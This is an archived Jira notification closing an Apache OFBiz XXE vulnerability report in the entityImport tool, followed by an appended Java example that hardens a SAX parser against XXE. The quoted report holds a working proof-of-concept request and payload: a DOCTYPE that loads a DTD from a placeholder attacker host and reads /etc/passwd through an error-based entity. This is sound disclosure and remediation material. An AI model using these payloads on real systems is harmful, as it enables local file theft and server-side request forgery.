ofbiz-notifications mailing list archives

From "Jacques Le Roux (Jira)" <j...@apache.org>
Subject [jira] [Closed] (OFBIZ-11195) XML Entity Injection in webtools/control/entityImport
Date Sun, 05 Apr 2020 09:29:00 GMT

     [ https://issues.apache.org/jira/browse/OFBIZ-11195?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux closed OFBIZ-11195.
-----------------------------------
    Fix Version/s: 17.12.02
                   18.12.01
         Assignee: Jacques Le Roux
       Resolution: Fixed

This is fixed with OFBIZ-11470

>  XML Entity Injection in webtools/control/entityImport
> ------------------------------------------------------
>
>                 Key: OFBIZ-11195
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-11195
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: Trunk
>            Reporter: Jacques Le Roux
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.01, 17.12.02
>
>
> This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com.
> We did not consider it as a real security issue because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser used by
> the XML Data Import functionality does not have DTD parsing explicitly disabled which makes
> it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an 'error-based'
> approach is needed to read local files. The parser will also resolve external entities so
> this vulnerability can also be used for internal port scanning or server-side request forgery.
>  Affected URL:
>  /webtools/control/entityImport
> POC Example Request:
>  POST /webtools/control/entityImport HTTP/1.1
>  Host:<host>
>  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
>  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>  Accept-Language: en-US,en;q=0.5
>  Accept-Encoding: gzip, deflate
>  Referer: <host>/webtools/control/entityImport
>  Content-Type: application/x-www-form-urlencoded
>  Content-Length: 312
>  Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
>  Connection: close
>  Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
>  <?xml version="1.0" encoding="utf-8"?>
>  <!DOCTYPE notfound [
>  <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
>  %base;
>  %param1;
>  %external;
>  ]>
>  <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
>  <!ENTITY % payload SYSTEM "file:///etc/passwd">
>  <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>"
>
> {quote}
> We have reproduced it at [https://demo-stable.ofbiz.apache.org/webtools/control/entityImport] using:
> {code:xml}
> <?xml version="1.0" encoding="utf-8"?>
>  <!DOCTYPE notfound [
>  <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
>  %base;
>  %param1;
>  %external;
>  ]>
>  <root><foo>bar</bar></root>
> {code}



--
This message was sent by Atlassian Jira
(v8.3.4#803005)
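As an added example, not part of this ticket or of the OFBiz code base: the hardening the report calls for (DTD processing explicitly disabled on the SAX parser), shown as a Java configuration that refuses any document carrying a DOCTYPE before an entity can be resolved. The class and method names are my own and the two sample documents are constructed.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxDemo {

    // Constructed sample: a document that declares a DOCTYPE. An internal entity is
    // enough here, because the hardened parser rejects the DOCTYPE itself before any
    // entity (internal or external) is ever resolved.
    static final String DOCTYPE_DOC =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
      + "<!DOCTYPE root [ <!ENTITY greet \"hello\"> ]>\n"
      + "<root><foo>&greet;</foo></root>\n";

    static final String PLAIN_DOC = "<root><foo>bar</foo></root>";

    // SAXParserFactory with DTD processing switched off (standard OWASP XXE guidance).
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        // Refuse any DOCTYPE declaration: this one feature alone defeats XXE.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that must tolerate a DOCTYPE on legacy input.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f;
    }

    // Returns "ok" when the document parses, or "rejected: <reason>" when it is refused.
    static String tryParse(SAXParserFactory f, String xml) throws Exception {
        try {
            f.newSAXParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return "ok";
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        SAXParserFactory hardened = hardenedFactory();
        System.out.println("plain, hardened   -> " + tryParse(hardened, PLAIN_DOC));
        System.out.println("DOCTYPE, hardened -> " + tryParse(hardened, DOCTYPE_DOC));
        // Same DOCTYPE document through the JDK default factory, which accepts and expands it.
        System.out.println("DOCTYPE, default  -> " + tryParse(SAXParserFactory.newInstance(), DOCTYPE_DOC));
    }
}
```

The first feature is the one that matters for the entityImport case; the remaining three and the XInclude switch only add protection where a DOCTYPE cannot be rejected outright.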
